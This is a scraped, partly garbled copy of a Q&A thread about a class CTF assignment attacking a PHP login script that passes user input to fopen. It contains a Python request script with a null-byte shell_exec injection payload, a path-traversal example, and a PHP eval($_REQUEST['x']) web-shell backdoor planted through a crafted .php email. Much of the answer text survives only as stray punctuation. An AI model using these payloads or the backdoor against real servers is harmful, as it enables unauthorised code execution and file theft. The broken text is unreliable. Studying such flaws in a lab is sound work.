All geek questions in one place

Using vulnerabilities in php fopen

I take the cybersecurity class, and for the assignment we need to use a specific php file and get some access to the server on which it is located. I can set my own variables $emailand $ passwordas they are set with $_POST. I believe the only piece of code I can use is this.

$email = $_POST['email']
$password = $_POST['password']
....    
$accountfile = "./acounts/" . $email

if(!file_exists($accountfile)){
  diefooter("unknown email address or password")
}
$fh = fopen($accountfile, "r")
if(!$fh){
  diefooter("Cannot open file $accountfile.");
}
$last = fgets($fh);
$first = fgets($fh);
$pass = fgets($fh);

if(strcmp($pass,$password)!=0){
  diefooter("wrong email or password.")
}

I know that there are vulnerabilities built into the fopen () function, and that I can access the shell with the correct input.

filePath = "/var/ctf/music-copyright/html/cgi-bin/login.php"
shellKode = "exploit@gmail.com\0;echo shell_exec("+'"cat '+filePath+'");'
# payload = {'email':shellKode, 'password':'test'}
testPayload = {'email':'exploit@gmail.com','password':'a'}
r = requests.post(url, data = testPayload)
print(r.text)

, . , . fopen() - , , , , , .

+4
2

, CRLF.

php-, , .

, fopen . $email , CRLF, fopen() - , .

, $fh , , .

, : http://www.securiteam.com/unixfocus/5OP0C0A8AC.html

, :

, $password , .

, $pass , strcmp true, , .

$pass $pass = fgets($fh)

CRLF fopen, URL-, , . http://your.ip.address/your-file, , $password. .

- , .

$last = fgets($fh);
$first = fgets($fh);
$pass = fgets($fh);

, , $last, $first $pass , . .

# 2 - :

../ $email, fopen, acounts/.

:

<?php
$fh = fopen("acounts/../../test.sh","r");
?>

test.sh. , $email. , , $password, .

# 3 - , .php:

, drew010, , , $email, .php, eval() php code $password , backdoor acounts/, $email, .

+5

, , $accountfile = "./acounts/" . $email, , , , something@domain.php ( username.php , ).

( unhashed?) , - (, <?php eval($_REQUEST['x'] ?>).

, http://thesite/accounts/something@domain.php?x=echo 'hi'; , "" .

, $_REQUEST['x'] , (-) .

+3

Source: https://habr.com/ru/post/1667199/

More articles:


All Articles